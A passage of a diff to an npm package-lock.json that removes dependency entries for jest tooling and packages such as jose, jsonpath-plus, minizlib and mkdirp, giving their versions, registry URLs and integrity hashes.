^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "dependencies": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runner-eslint/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=", - "dev": true, - "peer": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/lines-and-columns": { - "version": "1.1.6", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.1.6.tgz", - "integrity": "sha1-HADHQ7QzzQpOgHWPe2SldEDZ/wA=", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.clonedeep": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", - "integrity": "sha1-4j8/nE+Pvd6HJSnBBxhXoIblzO8=", - "dev": true, - "peer": true - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "node_modules/lodash.truncate": { - "version": "4.4.2", - "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", - "integrity": "sha1-WjUNoLERO4N+z//VgSy+WNbq4ZM=", - "dev": true, - "peer": true - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "dependencies": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.0.tgz", - "integrity": "sha512-oGZRv2OT1lO2UF1zUcwdTb3wqUwI0kBGTgt/T7OdSj6M6N5m3o5uPf0AIW6lVxGGoiWUR7e2AwTE+xiwK8WQig==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/minizlib/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/minizlib/node_modules/glob": { - "version": "10.3.12", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.3.12.tgz", - "integrity": "sha512-TCNv8vJ+xz4QiqTpfOJA7HvYv+tNIRHKfUWw/q+v2jdgN4ebz+KY9tGx5J4rHP0o84mNP+ApH66HRX8us3Khqg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^2.3.6", - "minimatch": "^9.0.1", - "minipass": "^7.0.4", - "path-scurry": "^1.10.2" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/minimatch": { - "version": "9.0.4", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", - "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/rimraf": { - "version": "5.0.5", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.5.tgz", - "integrity": "sha512-CqDakW+hMe/Bz202FPEymy68P+G50RfMQK+Qo5YUqc9SPipvbGjCGKd0RSKEelbsfQuw3g5NZDSrlZZAJurH1A==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": 